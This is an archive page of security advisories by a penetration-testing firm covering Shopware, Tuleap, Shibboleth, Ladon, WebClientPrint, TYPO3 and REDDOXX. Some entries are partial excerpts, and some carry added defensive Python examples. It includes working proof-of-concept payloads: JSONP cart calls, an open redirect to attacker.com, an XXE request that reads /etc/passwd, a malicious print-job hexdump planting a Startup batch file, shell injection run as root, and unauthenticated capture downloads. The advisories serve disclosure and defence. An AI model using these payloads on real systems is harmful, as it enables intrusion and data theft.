CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH


Introduction


"Shopware 5 is the next generation of open source e-commerce software made in
Germany. Based on bleeding edge technologies like Symfony 2, Doctrine 2 & Zend
Framework Shopware comes as the perfect platform for your next e-commerce
project. Furthermore Shopware 5 provides an event-driven plugin system and an
advanced hook system, giving you the ability to customize every part of the
platform."
(from the Shopware GitHub repository [1])


More Details


The Shopware web application provides users with a virtual shopping cart to
collect products prior to checkout. This cart is displayed to the user as a
modal sidebar appearing at the right edge of the browser window. Consequently,
Shopware implements several API endpoints to allow JavaScript code to perform
shopping cart operations. These endpoints are implemented in the
"Shopware_Controllers_Frontend_Checkout" class and can be reached through the
following paths:

 * /checkout/ajaxCart
 * /checkout/ajaxAddArticleCart
 * /checkout/ajaxDeleteArticleCart

RedTeam Pentesting discovered that these API endpoints support JSONP when a
URL parameter named "callback" is specified. The origin of calls to the cart
API is not validated. Therefore, any third-party website may make use of this
API. If a customer of a Shopware shop visits a malicious, attacker-controlled
website, JavaScript code on this site may access the user's shopping cart.


Proof of Concept


The following JavaScript snippets demonstrate how to access the cart of a
Shopware shop at "https://example.net" from a third-party website. The
"getJSON" function of jQuery 3 is used to interface with the JSONP API.

By running the following code, the contents of a cart may be retrieved. The
result of the API call is displayed on the browser's developer console.


$.getJSON("https://example.net/checkout/ajaxCart?callback=?")
.done(console.log);


The following code adds a new product to the cart. In this case, two instances
of product 1234 are added.


$.getJSON(
  "https://example.net/checkout/ajaxAddArticleCart"+
  "?callback=?&sAdd=1234&sQuantity=2"
).done(console.log);


To remove a product from a user's shopping cart, attackers may use the
following code. An id for the "sDelete" parameter may be obtained through a
prior call to ajaxCart.


$.getJSON(
  "https://example.net/checkout/ajaxDeleteArticleCart"+
  "?callback=?&sDelete=4321"
).done(console.log);



Workaround
==

Support for JSONP should be removed from the cart AJAX API. This ensures that
only JavaScript code from the same origin may access the API and thus the
cart's contents. Furthermore, operations which change the state of the cart,
i.e. adding and removing products, must be protected with CSRF tokens.
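As an added illustration of this workaround (example code, not Shopware's own), a request guard in Python that refuses the JSONP "callback" parameter on every cart endpoint and demands a session-bound CSRF token for the two state-changing ones; the X-CSRF-Token header name is an assumption of the example.

```python
import hmac
from typing import Mapping, Tuple

# Cart endpoints named in the advisory. The two state-changing ones are the
# CSRF-relevant targets; ajaxCart only reads the cart.
STATE_CHANGING = {"/checkout/ajaxAddArticleCart", "/checkout/ajaxDeleteArticleCart"}
CART_ENDPOINTS = STATE_CHANGING | {"/checkout/ajaxCart"}

# Header carrying the per-session token (name assumed for this example).
CSRF_HEADER = "X-CSRF-Token"


def check_cart_request(path: str, params: Mapping[str, str],
                       headers: Mapping[str, str],
                       session_token: str) -> Tuple[bool, str]:
    """Decide whether a cart API request may be served.

    Returns (allowed, reason). Modelled on the advisory's workaround: no JSONP
    on any cart endpoint, and a session-bound CSRF token on every operation
    that changes the cart.
    """
    if path not in CART_ENDPOINTS:
        return False, "unknown endpoint"

    # JSONP wraps the JSON in a function call that a <script> tag from any
    # origin can load, which is exactly what let third-party sites read the
    # cart. Refuse the parameter instead of honouring it; a plain JSON reply
    # stays unreadable from other origins under the same-origin policy.
    if "callback" in params:
        return False, "JSONP is disabled"

    if path in STATE_CHANGING:
        presented = headers.get(CSRF_HEADER, "")
        # A cross-site request (link, script tag, image) cannot attach this
        # header, so adding or removing products from another origin fails.
        if not presented or not hmac.compare_digest(presented, session_token):
            return False, "missing or invalid CSRF token"

    return True, "ok"
```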


Fix
===

Upgrade to Shopware newer than 5.4.0.


Security Risk
=

This vulnerability is rated as a low risk. Disclosure of a user's shopping cart
to attackers may negatively impact the user's privacy. Furthermore, competing
eCommerce sites may use this information to improve sales. By adding or
removing products from a user's cart, attackers can negatively impact a user's
shopping experience and create support effort for the shop operator.


Timeline


2017-08-28 Vulnerability identified
2017-09-13 Customer approved disclosure to vendor
2017-09-14 Vendor notified
2018-02-27 Vendor released fixed version
2018-03-13 Advisory released


References
==

[1] https://github.com/shopware/shopware
[2] https://community.shopware.com/Downloads_cat_448.html#5.4.0



[FD] [RT-SA-2018-001] Arbitrary Redirect in Tuleap

2018-03-08 Thread RedTeam Pentesting GmbH
Advisory: Arbitrary Redirect in Tuleap

RedTeam Pentesting discovered an arbitrary redirect vulnerability in the
redirect mechanism of the application lifecycle management platform
Tuleap.


Details
===

Product: Tuleap
Affected Versions: > 9.17.99.93
Fixed Versions: >= 9.17.99.93
Vulnerability Type: Arbitrary Redirect
Security Risk: low
Vendor URL: https://www.tuleap.org/
Vendor Status: fixed version released
Vendor Issue URL: https://tuleap.net/plugins/tracker/?aid=11136
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2018-001
Advisory Status: published
CVE: GENERIC-MAP-NOMATCH
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH


Introduction


"Tuleap is an open source tool for Scrum, Kanban, waterfall,
requirement management. Plan, track, code and collaborate on software
projects, you get everything at hand."
(from the Tuleap website [1])


More Details


RedTeam Pentesting discovered an arbitrary redirect vulnerability in the
way Tuleap handles redirects. Usually, this function is only used in
Tuleap after a successful login to assigned trackers; however, the
redirect can be used independently of whether a user is authenticated to
the application. While the application employs a URL filter to prevent
arbitrary redirects, the URL filter can be bypassed. This allows
attackers to redirect users to a different website if a user opens an
attacker-prepared URL.

The filter can be bypassed by using protocol relative URLs, which omit
the leading protocol identifier. These arbitrary URLs are prefixed with
two slashes, which instructs the browser to use the same protocol as the
current page. This behaviour is specified in RFC 3986 [2] in section
5.4.


Proof of Concept


The following URL to an example installation of Tuleap will redirect
users to an attacker controlled website:

https://example.net/my/redirect.php?return_to=//attacker.com
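An added example, not Tuleap's code: a Python validator for the return_to parameter that accepts only a path on the current origin, shown beside a naive scheme-prefix filter of the kind the protocol-relative bypass above defeats.

```python
from urllib.parse import urlsplit


def naive_return_to_filter(return_to: str) -> bool:
    """Illustration of a bypassable filter (constructed for this example,
    not Tuleap's code): it only rejects targets with an explicit scheme,
    so a protocol-relative reference such as "//attacker.com" passes."""
    return not return_to.lower().startswith(("http://", "https://"))


def is_safe_return_to(return_to: str) -> bool:
    """Accept only a path on the current origin, in RFC 3986 [2] terms:
    no scheme, no authority, and nothing a browser could reinterpret as one."""
    if not return_to.startswith("/"):
        return False                      # must be an absolute path on this host
    if return_to.startswith("//"):
        return False                      # network-path reference: "//attacker.com"
    if "\\" in return_to:
        return False                      # browsers treat "/\attacker.com" like "//"
    if any(ord(c) < 0x21 or ord(c) == 0x7F for c in return_to):
        return False                      # control characters and whitespace
    parts = urlsplit(return_to)
    # After the checks above urlsplit must see neither a scheme nor a host.
    return parts.scheme == "" and parts.netloc == ""
```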


Workaround
==

Currently no workaround is known.


Fix
===

Upgrade to at least Tuleap version 9.17.99.93.


Security Risk
=

Attackers may convince users to use a prepared link to access a valid
Tuleap instance, which then redirects users to a fake login page. This
can greatly increase the effectiveness of phishing attacks and may allow
attackers to steal user credentials more effectively. However, no
credentials or sensitive information can be extracted directly.
Furthermore, the website to which users are going to be redirected will
be displayed in the browser's location bar, so that users may identify
the attack. Therefore, we rate this vulnerability as a low risk.

Nevertheless, it is very easy for attackers to identify this
vulnerability and create malicious URLs, which makes it very likely that
attackers might abuse this.


Timeline


2018-01-02 Vulnerability identified
2018-01-11 Customer approved disclosure to vendor
2018-02-13 Vendor notified
2018-02-14 Vendor released fixed version
2018-03-05 Vendor made issue public 
2018-03-08 Advisory released 


References
==

[1] https://www.tuleap.org/what-is-tuleap
[2] https://tools.ietf.org/html/rfc3986



[FD] [RT-SA-2017-013] Truncation of SAML Attributes in Shibboleth 2

2018-01-15 Thread RedTeam Pentesting GmbH
ST request which is then sent to the service provider.

The SAML response is accepted by the service provider. Due to the
vulnerability, the service provider application reports "taf" as the
value of the "uid" attribute.


Workaround
==

The use of XML encryption can serve as a mitigation for this
vulnerability but may still allow attacks in certain scenarios.


Fix
===

Manually update to the latest version [4] as described in the security
advisory published by Shibboleth [5]. Alternatively, use the operating
system's package management to receive the update [6].

Furthermore, a new version of the XMLTooling-C library (1.6.3) has been
released to address this vulnerability. DTD processing is now disabled
in the XML parser. Yet, some platforms ship with old parser versions
that do not allow DTD processing to be disabled, namely Red Hat and
CentOS.  Therefore, the "unmarshallContent" function has also been
hardened to mitigate the vulnerability on these platforms.


Security Risk
=

The key feature of Shibboleth, secure transfer of assertions, is
compromised. Therefore, the vulnerability is rated as a high risk. In
certain circumstances, this might lead to a complete bypass of
authorisation mechanisms. In practice, the risk for service providers is
highly dependent on the actual deployment of the Shibboleth
infrastructure: Sometimes, SAML responses are encrypted or not
transferred through a browser. In this case, an attacker is not able to
insert XML entities. Whether truncating SAML attribute values is
profitable for attackers also depends on the actual use and structure of
these values. Attackers may use an application's self-service features
to change their account's email to a manipulated but valid address.
Truncation of this email address in a SAML response could lead to access
to further accounts, effectively bypassing authorisation mechanisms.


Timeline


2017-11-06 Vulnerability identified
2017-11-13 Customer approved further research
2017-12-01 Further research conducted
2018-01-09 Customer approved disclosure to vendor
2018-01-10 Vendor notified
2018-01-12 Vendor released fixed version
2018-01-15 Advisory released


References
==

[1] https://www.shibboleth.net/
[2] https://www.w3.org/TR/xmldsig-core/
[3] https://github.com/UniconLabs/dockerized-idp-testbed
[4] https://shibboleth.net/downloads/service-provider/2.6.1/
[5] https://shibboleth.net/community/advisories/secadv_20180112.txt
[6] https://security-tracker.debian.org/tracker/CVE-2018-0486



[FD] [RT-SA-2016-008] XML External Entity Expansion in Ladon Webservice

2017-11-03 Thread RedTeam Pentesting GmbH
sponse containing the passwd-file:



<SOAP-ENV:Envelope SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"
 xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
 xmlns:ns="urn:HelloService"
 xmlns:xsd="http://www.w3.org/2001/XMLSchema">
  <SOAP-ENV:Body SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">

      Hello root:x:0:0:root:/root:/bin/bashdaemon:x:1:1:[...]

  </SOAP-ENV:Body>
</SOAP-ENV:Envelope>



Workaround
==

The Python package defusedxml [2] can be used to monkey patch the code to
prevent XML vulnerabilities.  The following workaround can be included in the
code, which prevents exploitation:


[...]
import defusedxml
defusedxml.defuse_stdlib()
[...]
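Added example, not part of the advisory or of Ladon: the DTD rejection that defusedxml's defuse_stdlib() installs, written directly against the standard-library expat parser so its effect on a SOAP request can be observed; the sayHello operation and the name element in the constructed requests are assumptions.

```python
import xml.parsers.expat


class ForbiddenDTD(ValueError):
    """Raised when a request carries a DOCTYPE or an entity declaration."""


def extract_text_without_dtd(document: bytes) -> str:
    """Parse XML with the standard-library expat parser while refusing any
    DTD, which is where external entities such as file:///etc/passwd get
    declared. Returns the concatenated non-blank character data, enough to
    show what the service would see as the request body. This is the same
    guard defusedxml applies (forbid_dtd), implemented by hand."""
    parser = xml.parsers.expat.ParserCreate()

    def reject_doctype(name, sysid, pubid, has_internal_subset):
        # Fires at "<!DOCTYPE", before any entity in the subset is processed.
        raise ForbiddenDTD("DOCTYPE declaration rejected: %s" % name)

    def reject_entity(*_args):
        raise ForbiddenDTD("entity declaration rejected")

    parser.StartDoctypeDeclHandler = reject_doctype
    parser.EntityDeclHandler = reject_entity
    chunks = []
    parser.CharacterDataHandler = chunks.append
    parser.Parse(document, True)
    return "".join(c for c in chunks if c.strip())


# Constructed sample requests for the urn:HelloService namespace shown in the
# advisory's response; the sayHello operation and "name" element are assumed.
BENIGN_REQUEST = b"""<?xml version="1.0"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
 xmlns:ns="urn:HelloService">
  <SOAP-ENV:Body><ns:sayHello><name>World</name></ns:sayHello></SOAP-ENV:Body>
</SOAP-ENV:Envelope>"""

# The same request with an external entity that a DTD-processing parser
# would expand into the contents of the passwd file.
XXE_REQUEST = b"""<?xml version="1.0"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
 xmlns:ns="urn:HelloService">
  <SOAP-ENV:Body><ns:sayHello><name>&xxe;</name></ns:sayHello></SOAP-ENV:Body>
</SOAP-ENV:Envelope>"""


def request_is_blocked(document: bytes) -> bool:
    """True when the DTD guard rejects the document before it is processed."""
    try:
        extract_text_without_dtd(document)
    except ForbiddenDTD:
        return True
    return False
```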



Fix
===

Currently no fix is available.


Security Risk
=

Attackers are able to read local files on the server of the webservice
with the privileges of the webservice. Furthermore, attackers are able
to create HTTP requests from the webservice to other services on the
Internet or the local network. It is likely that attackers are able to
gain access to credentials for database services used by the webservice.
Attackers may also be able to cause a denial-of-service attack against
the respective webservice. Depending on the data stored on the
vulnerable system and the relevance of the webservice, this
vulnerability may pose a high risk.


Timeline


2016-11-29 Vulnerability identified
2016-11-29 Customer notified vendor
2017-07-10 Customer fixed problem in their own product
2017-07-21 RedTeam Pentesting notified vendor
2017-08-11 RedTeam Pentesting asked vendor for status update
2017-09-08 RedTeam Pentesting asked vendor for status update and announced
   public release for end of October
2017-10-09 RedTeam Pentesting asked vendor for status update
2017-11-03 Advisory released (no reply from vendor to status update requests)


References
==

[1] http://ladonize.org
[2] https://pypi.python.org/pypi/defusedxml



[FD] [RT-SA-2015-011] WebClientPrint Processor 2.0: No Validation of TLS Certificates

2017-08-22 Thread RedTeam Pentesting GmbH
isable the WCPP handler and upgrade to a fixed
version as soon as possible.


Fix
===

Install a WCPP version greater than or equal to 2.0.15.910 [0].


Security Risk
=

WCPP does not verify TLS certificates when establishing HTTPS
connections. Man-in-the-middle attackers can therefore intercept those
connections with little effort. This may lead to a disclosure of
confidential information if sensitive documents are printed via WCPP.
Furthermore, the integrity of the printed documents cannot be guaranteed
as attackers are able to modify the documents in transit.

The described attack requires a man-in-the-middle position which is a
rather strong prerequisite. It is therefore estimated that the
vulnerability poses a medium risk.


Timeline


2015-08-24 Vulnerability identified
2015-09-03 Customer approved disclosure to vendor
2015-09-04 Asked vendor for security contact
2015-09-04 CVE number requested
2015-09-04 Vendor responded with security contact
2015-09-07 Vendor notified
2015-09-07 Vendor acknowledged receipt of advisory
2015-09-15 Vendor released fixed version
2015-09-16 Customer asked to wait with advisory release until all their
   clients are updated
2017-07-31 Customer approved advisory release
2017-08-22 Advisory released


References
==

[0] 
https://neodynamic.wordpress.com/2015/09/15/webclientprint-2-0-for-windows-clients-critical-update/
[1] http://www.dest-unreach.org/socat/



[FD] [RT-SA-2015-010] WebClientPrint Processor 2.0: Unauthorised Proxy Modification

2017-08-22 Thread RedTeam Pentesting GmbH
proved advisory release
2017-08-22 Advisory released


References
==

[0] 
https://neodynamic.wordpress.com/2015/09/15/webclientprint-2-0-for-windows-clients-critical-update/



[FD] [RT-SA-2015-009] WebClientPrint Processor 2.0: Remote Code Execution via Updates

2017-08-22 Thread RedTeam Pentesting GmbH
ace. This way, WCPP
functionality would not be disrupted and the attacked users may be
tricked to believe that a legitimate update has just occurred.

Because of the rarely fulfilled prerequisite of a browser running with
elevated or administrative privileges, this vulnerability is estimated
to pose a low risk.


Timeline


2015-08-24 Vulnerability identified
2015-09-03 Customer approved disclosure to vendor
2015-09-04 Asked vendor for security contact
2015-09-04 CVE number requested
2015-09-04 Vendor responded with security contact
2015-09-07 Vendor notified
2015-09-07 Vendor acknowledged receipt of advisory
2015-09-15 Vendor released fixed version
2015-09-16 Customer asked to wait with advisory release until all their
   clients are updated
2017-07-31 Customer approved advisory release
2017-08-22 Advisory released


References
==

[0] 
https://neodynamic.wordpress.com/2015/09/15/webclientprint-2-0-for-windows-clients-critical-update/



[FD] [RT-SA-2015-008] WebClientPrint Processor 2.0: Remote Code Execution via Print Jobs

2017-08-22 Thread RedTeam Pentesting GmbH
ctory is located at:

C:\Users\<username>\AppData\Local\Temp\


Proof of Concept


During RedTeam Pentesting's analysis of WCPP it was found that malicious
CPJ files can be crafted that exploit a directory traversal bug in WCPP.
Such an example is given in the following hexdump, showing the file
rce-user.txt:

---
$ xxd rce-user.txt
00000000: 6370 6a02 0201 0000 0301 0000 7763 7050  cpj.........wcpP
00000010: 463a 2e2e 5c2e 2e5c 526f 616d 696e 675c  F:..\..\Roaming\
00000020: 4d69 6372 6f73 6f66 745c 5769 6e64 6f77  Microsoft\Window
00000030: 735c 5374 6172 7420 4d65 6e75 5c50 726f  s\Start Menu\Pro
00000040: 6772 616d 735c 5374 6172 7475 705c 5265  grams\Startup\Re
00000050: 6454 6561 6d2e 6261 747c 4065 6368 6f20  dTeam.bat|@echo 
00000060: 6f66 660d 0a63 6c73 0d0a 6563 686f 2e0d  off..cls..echo..
00000070: 0a65 6368 6f20 5072 6f6f 662d 6f66 2d43  .echo Proof-of-C
00000080: 6f6e 6365 7074 0d0a 6563 686f 202d 2d2d  oncept..echo ---
00000090: 2d2d 2d2d 2d2d 2d2d 2d2d 2d2d 2d0d 0a65  -------------..e
000000a0: 6368 6f20 5265 6d6f 7465 2043 6f64 6520  cho Remote Code 
000000b0: 4578 6563 7574 696f 6e20 7669 6120 5765  Execution via We
000000c0: 6243 6c69 656e 7450 7269 6e74 2076 322e  bClientPrint v2.
000000d0: 302e 3135 2e31 3039 0d0a 464f 5220 2f4c  0.15.109..FOR /L
000000e0: 2025 2578 2049 4e20 2831 2c31 2c31 3829   %%x IN (1,1,18)
000000f0: 2044 4f20 6563 686f 2e0d 0a73 7461 7274   DO echo...start
00000100: 2063 616c 630d 0a70 6175 7365 0d0a 007c   calc..pause...|
---

In this example the filename is set to

..\..\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RedTeam.bat

which is appended to the %TEMP% directory as follows:

C:\Users\<username>\AppData\Local\Temp\..\..\Roaming\Microsoft\Windows\
Start Menu\Programs\Startup\RedTeam.bat

After resolving the "..\..\" sequence contained in the filename, this
yields the following path:

C:\Users\<username>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\
Startup\RedTeam.bat

As a consequence, the file content beginning at 0x5a is written to the
file RedTeam.bat in the current user's Startup folder. Therefore,
RedTeam.bat will be executed once the affected user logs in again. As a
proof of concept, a text will be displayed and Windows' calculator is
executed.
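Added example, not WCPP's code: the path resolution described above reproduced with Python's ntpath, beside a hardened version that refuses any CPJ file name whose resolved form leaves %TEMP%; the user name alice in the temp path is a constructed placeholder.

```python
import ntpath
from typing import Optional

# Constructed %TEMP% value standing in for C:\Users\<username>\AppData\Local\Temp
TEMP_DIR = r"C:\Users\alice\AppData\Local\Temp"

# The file name carried in the advisory's CPJ proof of concept.
POC_NAME = r"..\..\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RedTeam.bat"


def naive_target(filename: str) -> str:
    """The behaviour the advisory describes: the CPJ file name is simply
    appended to %TEMP%, and Windows then resolves the "..\\" components."""
    return ntpath.normpath(ntpath.join(TEMP_DIR, filename))


def safe_target(filename: str) -> Optional[str]:
    """Hardened variant: keep the resolved path inside TEMP_DIR or refuse it.

    Rejects empty names, absolute paths, drive or UNC prefixes, embedded NULs,
    and any name whose normalised form escapes the temp directory. ntpath
    applies the Windows rules regardless of the host this runs on."""
    if not filename or ntpath.isabs(filename) or ntpath.splitdrive(filename)[0]:
        return None
    if "\x00" in filename:
        return None
    resolved = ntpath.normpath(ntpath.join(TEMP_DIR, filename))
    # Compare case-insensitively and with a trailing separator so that a
    # sibling such as "...\TempEvil" cannot pass as a prefix match.
    base = ntpath.normcase(ntpath.normpath(TEMP_DIR)) + "\\"
    if not ntpath.normcase(resolved).startswith(base):
        return None
    return resolved
```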

On one hand, this exploit can be executed when the following URL is
entered into the URL bar of a browser:

webclientprint:https://example.com/somedir/rce-user.txt

On the other hand, visiting users of a malicious website may be attacked
without user interaction when the webclientprint URL is embedded into an
iframe as follows:

---
<html>
<body>
<iframe src="webclientprint:https://example.com/somedir/rce-user.txt"></iframe>
</body>
</html>
---

The proof of concept printed above contains no valid license key, so a
notification window is shown when the exploit is executed. However, this
does not prevent successful exploitation. Attackers can easily add a
valid license key (e.g. by buying a license), so the window is not shown
and there is no visual indication of exploitation anymore.

The proof of concept is designed to print using the default printer.
Since WCPP does not seem to know how to print batch files, it exits
silently with the result that a successful attack does not print the
batch file.


Workaround
==

Affected users should disable the WCPP handler and upgrade to a fixed
version as soon as possible.


Fix
===

Install a WCPP version greater than or equal to 2.0.15.910 [1].


Security Risk
=

If a user of WCPP visits an attacker-controlled website, arbitrary code
can be executed on the attacked user's computer. If a valid license key
is provided, there is no visual indication of the ongoing attack.
Furthermore, no user interaction is required to trigger the
vulnerability once a malicious website is visited. It is therefore
estimated that this vulnerability poses a high risk.


Timeline


2015-08-24 Vulnerability identified
2015-09-03 Customer approved disclosure to vendor
2015-09-04 Asked vendor for security contact
2015-09-04 CVE number requested
2015-09-04 Vendor responded with security contact
2015-09-07 Vendor notified
2015-09-07 Vendor acknowledged receipt of advisory
2015-09-15 Vendor released fixed version
2015-09-16 Customer asked to wait with advisory release until all their
   clients are updated
2017-07-31 Customer approved advisory release
2017-08-22 Advisory released


References
==

[0] http://webclientprint.azurewebsites.net/
[1] 
https://neodynamic.wordpress.com/2015/09/15/webclientprint-2-0-for-windows-clients-critical-update/



[FD] [RT-SA-2016-007] Cross-Site Scripting in TYPO3 Formhandler Extension

2017-07-27 Thread RedTeam Pentesting GmbH
can only
target individual users. All in all this is considered to be a
medium-risk vulnerability. Depending on the affected site the risk needs
to be adjusted accordingly.


Timeline

2016-09-22 Vulnerability identified
2016-10-07 Customer approved disclosure to vendor
2016-10-07 Vendor notified
2016-10-11 Preliminary advisory sent to vendor
2016-10-12 Vendor prepared patch and sent it to TYPO3 security team
2016-10-13 Customer needs time to test the patch and deploy it
2017-07-10 Customer finished testing and deployment of patch
2017-07-17 Vendor agreed to have patch published as PR on Github
2017-07-27 Vendor patch published as pull request for a possibly active fork
2017-07-27 Advisory released


References
==

[0] https://github.com/reinhardfuehricht/typo3-formhandler/blob/master/Classes/Interceptor/RemoveXSS.php#L63
[1] https://docs.typo3.org/typo3cms/extensions/core/8-dev/Changelog/8.2/Deprecation-76164-DeprecateRemoveXSS.html
[2] https://packetstormsecurity.com/files/137127/typo3-xssbypass.txt
[3] http://examples.typo3-formhandler.com/start/


RedTeam Pentesting GmbH
===

RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at:
https://www.redteam-pentesting.de/


Working at RedTeam Pentesting
=

RedTeam Pentesting is looking for penetration testers to join our team
in Aachen, Germany. If you are interested please visit:
https://www.redteam-pentesting.de/jobs/

-- 
RedTeam Pentesting GmbH   Tel.: +49 241 510081-0
Dennewartstr. 25-27   Fax : +49 241 510081-99
52068 Aachenhttps://www.redteam-pentesting.de
Germany Registergericht: Aachen HRB 14004
Geschäftsführer:   Patrick Hof, Jens Liebchen


pgpaqBAK0ZX3w.pgp
Description: PGP signature

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] [RT-SA-2017-009] Remote Command Execution as root in REDDOXX Appliance

2017-07-24 Thread RedTeam Pentesting GmbH
---

Here, the count parameter "1 && echo 'REDTEAM_MARKER_START' && id && echo
'REDTEAM_MARKER_END'" is submitted. The two echo commands with markers are
only used to distinguish the output of the "id" command in the final
result, which can be retrieved and displayed using the following curl
command-line:


$ curl --silent -H 'Accept: application/json' \
http://www.example.com/api/v1/rws/diagnose/result/Ping | jq .Output | \
sed 's;.*REDTEAM_MARKER_START\\n\(.*\)\\nREDTEAM_MARKER_END.*;\1;' | \
sed 's/\\n/\n/g'
uid=0(root) gid=0(root) groups=0(root)
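The injection above works because the "count" value reaches a shell as part of a command string. As an added illustration (not code from the advisory or from REDDOXX), the following Python shows the vulnerable pattern next to a hardened ping diagnostic: parameters are validated against a strict grammar and passed as an argument vector, so shell separators such as "&&" or ";" are never interpreted. The host-name grammar and the count limit are assumptions chosen for the example.

```python
"""Validating the parameters of a 'ping' diagnostic before they reach a process."""
import ipaddress
import re
import subprocess

# Strict hostname grammar: labels of letters, digits and hyphens, no leading
# '-' (ping would parse it as an option), no shell metacharacters at all.
_HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)(?!-)[A-Za-z0-9-]{1,63}(?<!-)(\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*$"
)
MAX_COUNT = 10  # assumed upper bound for a diagnostic ping


class InvalidParameter(ValueError):
    """Raised when a diagnostic parameter fails validation."""


def vulnerable_command_line(host, count):
    # The pattern behind the advisory: untrusted values are pasted into one
    # string that a shell executes, so '1 && id' becomes part of the command.
    return f"ping -c {count} {host}"


def validate_host(host):
    try:
        return str(ipaddress.ip_address(host))  # IPv4/IPv6 literal
    except ValueError:
        pass
    if _HOSTNAME_RE.match(host):
        return host
    raise InvalidParameter(f"not a host name or IP address: {host!r}")


def validate_count(count):
    # Accept only a plain decimal integer inside a small fixed range.
    if not isinstance(count, int):
        if not (isinstance(count, str) and count.isdigit()):
            raise InvalidParameter(f"count must be a positive integer: {count!r}")
        count = int(count)
    if not 1 <= count <= MAX_COUNT:
        raise InvalidParameter(f"count out of range 1..{MAX_COUNT}: {count}")
    return count


def build_ping_argv(host, count):
    """Argument vector for subprocess: no shell, so no command separators."""
    return ["ping", "-c", str(validate_count(count)), validate_host(host)]


def is_valid_request(host, count):
    try:
        build_ping_argv(host, count)
        return True
    except InvalidParameter:
        return False


def run_ping(host, count):
    # Executed without a shell and with a timeout; output is returned, not echoed.
    proc = subprocess.run(build_ping_argv(host, count), capture_output=True,
                          text=True, timeout=60)
    return proc.stdout


if __name__ == "__main__":
    print(vulnerable_command_line("127.0.0.1", "1 && id"))
    print(build_ping_argv("127.0.0.1", "1"))
    print(is_valid_request("127.0.0.1", "1 && id"))
```

Validation alone is only half of the fix: the diagnostic endpoint must also require an authenticated administrative session, and the process executing the tool should not run as root, which is what turns this injection into a full compromise in the advisory.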



Workaround
==

None


Fix
===

Update the appliance software to Version 2032 SP2.


Security Risk
=

The diagnostic functions offered by the REDDOXX appliance allow attackers
to execute arbitrary commands. Since the commands are executed with root
privileges and no authentication is required, this is rated as a high
risk.


Timeline


2017-05-17 Vulnerability identified
2017-05-23 Customer approved disclosure of vulnerability
2017-05-26 Customer provided details of vulnerability to vendor
2017-07-20 Vulnerability reported as fixed by vendor
2017-07-24 Advisory released


References
==

[0] https://www.reddoxx.com/en/
[1] https://my.reddoxx.com/documents/manual/en/custdl/product-downloads
(Requires login)



[FD] [RT-SA-2017-008] Unauthenticated Access to Diagnostic Functions in REDDOXX Appliance

2017-07-24 Thread RedTeam Pentesting GmbH
Advisory: Unauthenticated Access to Diagnostic Functions in REDDOXX Appliance

RedTeam Pentesting discovered a vulnerability which allows attackers
unauthenticated access to the diagnostic functions of the administrative
interface of the REDDOXX appliance. The functions allow, for example, to
capture network traffic on the appliance's interfaces.


Details
===

Product: REDDOXX Appliance
Affected Versions: Build 2032 / v2.0.625, older versions likely affected too
Fixed Versions: Version 2032 SP2
Vulnerability Type: Authentication Bypass
Security Risk: high
Vendor URL: https://www.reddoxx.com/
Vendor Status: patch available
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2017-008
Advisory Status: published
CVE: GENERIC-MAP-NOMATCH
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH


Introduction


"REDDOXX is a leading supplier of solutions for e-mail archiving,
encrypted and digitally signed e-mail traffic as well as spam
protection. Our focus is on technological innovation: taking our cue
from our clients’ requirements our competent and quality-conscious
employees strive to offer you the best possible products at all times.
Using stringent quality standards and proven processes we keep
developing our company and products continuously, with the goal of
continuous improvement."

(from the vendor's homepage)


More Details


The administrative interface of the REDDOXX appliance [0] offers several
diagnostic tools in the "Diagnostic Center". Tcpdump is one of these
tools. This tool can be used to capture network traffic on local
interfaces.

During a penetration test, it was discovered that this function, as well
as the other diagnostic functions, does not require authentication.


Proof of Concept


The following curl command-line can be used to start the capture
process:


$ curl --include --silent -H 'Content-Type: application/json' \
--data-binary '{"Name":"Tcpdump","Parameter":{"host":"","port":""}}' \
http://www.example.com/api/v1/rws/diagnose/start
HTTP/1.1 200 OK
Date: Thu, 18 May 2017 14:58:22 GMT
Server: Apache/2.4.7 (Ubuntu)
X-Powered-By: PHP/5.5.9-1ubuntu4.14
[...]
Content-Length: 0
Content-Type: application/xml


The following curl command-line stops the capture process:


$ curl --include --silent -H 'Content-Type: application/json' \
--data-binary '{"Name":"Tcpdump"}' \
http://www.example.com/api/v1/rws/diagnose/stop
HTTP/1.1 200 OK
Date: Thu, 18 May 2017 15:00:17 GMT
Server: Apache/2.4.7 (Ubuntu)
X-Powered-By: PHP/5.5.9-1ubuntu4.14
[...]
Content-Length: 0
Content-Type: application/xml


After the capture process is complete, the resulting capture file can be
downloaded without authentication:


$ wget http://www.example.com/rws/resources/diagnosemanager/tcpdump.cap
[...]
Connecting to www.example.com:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1801530 (1.7M) [application/vnd.tcpdump.pcap]
Saving to: ‘tcpdump.cap’
tcpdump.cap 100%[===>]
1.72M [...]
2017-05-18 17:01:36 (34.1 MB/s) - ‘tcpdump.cap’ saved [1801530/1801530]


None of these requests contain credentials or cookies that could serve as
authentication.
